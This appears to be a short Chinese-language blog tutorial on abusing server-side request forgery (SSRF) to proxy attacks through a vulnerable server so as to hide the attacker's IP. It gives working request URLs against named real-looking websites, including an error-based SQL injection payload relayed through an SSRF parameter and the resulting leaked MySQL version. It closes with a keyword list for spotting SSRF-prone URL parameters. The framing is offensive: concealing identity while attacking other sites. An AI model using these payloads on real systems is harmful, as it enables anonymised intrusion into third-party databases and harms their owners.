如果直接访问 http://www.ip.cn/ 就可以知道自己的ip地址,这样直接攻击网站就会暴露自己,但是,如果用ssrf这个漏洞,就可以用远程的服务器做代理去攻击其他网站
例子:
如果你这样访问http://qjjz.net/newsweb/news.shtml?url=http://www.ip.cn
查看源代码,你会发现你的ip变成了,
当前 IP:124.40.116.24 来自:北京市 飞华领航科技
这样你攻击一个网站比如:
http://qjjz.net/newsweb/news.shtml?url=http://www.hexie.com/main/articleDetail.php?id=757' and extractvalue(1, concat(0x5c,version())) %2523
显示出来的信息是:
MySQL Query Error:select * from knowledge where id='757' and extractvalue(1, concat(0x5c,version())) #':XPATH syntax error: '\5.5.20'
和自己直接注入是一样的
如何寻找ssrf漏洞
在对功能上存在SSRF漏洞中URL地址特征的观察,大致有以下关键字:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
|
share
wap
url
link
src
source
target
u
3g
display
sourceURl
imageURL
domain
...
|